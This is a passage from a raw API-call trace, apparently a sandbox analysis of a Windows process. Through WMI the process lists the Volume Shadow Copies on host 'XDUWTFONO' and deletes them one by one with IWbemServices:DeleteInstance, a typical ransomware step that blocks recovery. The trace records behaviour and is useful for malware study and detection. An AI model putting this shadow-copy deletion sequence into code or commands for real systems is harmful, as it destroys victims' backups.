ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0121.074] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0121.075] IUnknown:AddRef (This=0x1c9062d0) returned 0x3 [0121.075] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0121.075] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c9062d8) returned 0x0 [0121.075] IMarshal:GetUnmarshalClass (in: This=0x1c9062d8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0121.075] IUnknown:Release (This=0x1c9062d8) returned 0x3 [0121.075] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0121.075] IUnknown:AddRef (This=0x1c9062d0) returned 0x4 [0121.075] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0121.075] IUnknown:Release (This=0x1c9062d0) returned 0x3 [0121.075] IUnknown:Release (This=0x1c9062d0) returned 0x2 [0121.076] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0121.076] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0121.076] IUnknown:AddRef (This=0x1c9062d0) returned 0x3 [0121.076] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c9062d0) returned 0x0 [0121.076] IUnknown:Release (This=0x1c9062d0) returned 0x3 [0121.076] IUnknown:Release (This=0x1c9062d0) returned 0x2 [0121.076] IUnknown:Release (This=0x1c9062d0) returned 0x1 [0121.076] CoTaskMemFree (pv=0x1b77f8d0) [0121.076] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0121.076] IUnknown:AddRef (This=0x1c9062d0) returned 0x2 [0121.076] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0121.076] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0121.077] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x53 [0121.077] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0121.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0121.077] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0121.077] IUnknown:Release (This=0x212498) returned 0x1 [0121.077] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901f20) returned 0x0 [0121.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901f20, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0121.078] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901f20, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902d10) returned 0x0 [0121.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902d10) returned 0x0 [0121.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0121.078] WbemDefPath:IUnknown:AddRef (This=0x1c902d10) returned 0x3 [0121.079] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0121.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b792d70) returned 0x0 [0121.079] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b792d70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0121.079] WbemDefPath:IUnknown:Release (This=0x1b792d70) returned 0x3 [0121.079] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0121.079] WbemDefPath:IUnknown:AddRef (This=0x1c902d10) returned 0x4 [0121.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0121.079] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x3 [0121.079] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x2 [0121.079] WbemDefPath:IUnknown:Release (This=0x1c901f20) returned 0x0 [0121.079] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x1 [0121.080] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0121.080] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0121.080] WbemDefPath:IUnknown:AddRef (This=0x1c902d10) returned 0x2 [0121.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902d10) returned 0x0 [0121.080] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x2 [0121.080] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x1 [0121.080] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0121.080] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0121.080] WbemDefPath:IUnknown:AddRef (This=0x1c902d10) returned 0x2 [0121.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902d10, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902d10) returned 0x0 [0121.080] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x2 [0121.080] WbemDefPath:IUnknown:AddRef (This=0x1c902d10) returned 0x3 [0121.080] WbemDefPath:IWbemPath:SetText (This=0x1c902d10, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0121.080] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x2 [0121.081] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0121.081] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0121.081] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0121.081] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0121.081] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0121.081] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0121.081] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0121.081] SysStringLen (param_1="root\\cimv2") returned 0xa [0121.082] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0121.082] SysStringLen (param_1="root\\cimv2") returned 0xa [0121.082] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0121.082] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0121.082] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0121.082] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0121.082] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0121.082] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0121.082] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0121.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902d10, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetText (in: This=0x1c902d10, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetText (in: This=0x1c902d10, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0121.085] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0121.085] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0121.085] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0121.085] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0121.085] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0121.085] IWbemClassObject:Get (in: This=0x1c9062d0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0121.085] WbemDefPath:IWbemPath:GetText (in: This=0x1c902d10, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0121.086] WbemDefPath:IWbemPath:GetText (in: This=0x1c902d10, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0121.086] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0122.048] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0122.048] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c906970, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0122.050] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c906970) returned 0x0 [0122.050] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0122.050] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0122.051] IUnknown:AddRef (This=0x1c906970) returned 0x3 [0122.051] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0122.051] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c906978) returned 0x0 [0122.051] IMarshal:GetUnmarshalClass (in: This=0x1c906978, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.051] IUnknown:Release (This=0x1c906978) returned 0x3 [0122.051] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0122.051] IUnknown:AddRef (This=0x1c906970) returned 0x4 [0122.051] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0122.051] IUnknown:Release (This=0x1c906970) returned 0x3 [0122.052] IUnknown:Release (This=0x1c906970) returned 0x2 [0122.052] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0122.052] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0122.052] IUnknown:AddRef (This=0x1c906970) returned 0x3 [0122.052] IUnknown:QueryInterface (in: This=0x1c906970, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c906970) returned 0x0 [0122.052] IUnknown:Release (This=0x1c906970) returned 0x3 [0122.052] IUnknown:Release (This=0x1c906970) returned 0x2 [0122.052] IUnknown:Release (This=0x1c906970) returned 0x1 [0122.052] CoTaskMemFree (pv=0x1b77f8d0) [0122.052] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0122.052] IUnknown:AddRef (This=0x1c906970) returned 0x2 [0122.053] IWbemClassObject:Get (in: This=0x1c906970, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0122.053] IWbemClassObject:Get (in: This=0x1c906970, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0122.053] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x53 [0122.053] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0122.053] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0122.053] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0122.053] IUnknown:Release (This=0x212498) returned 0x1 [0122.054] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901fe0) returned 0x0 [0122.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901fe0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0122.055] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901fe0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902dd0) returned 0x0 [0122.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902dd0) returned 0x0 [0122.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0122.055] WbemDefPath:IUnknown:AddRef (This=0x1c902dd0) returned 0x3 [0122.055] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0122.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902dd0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 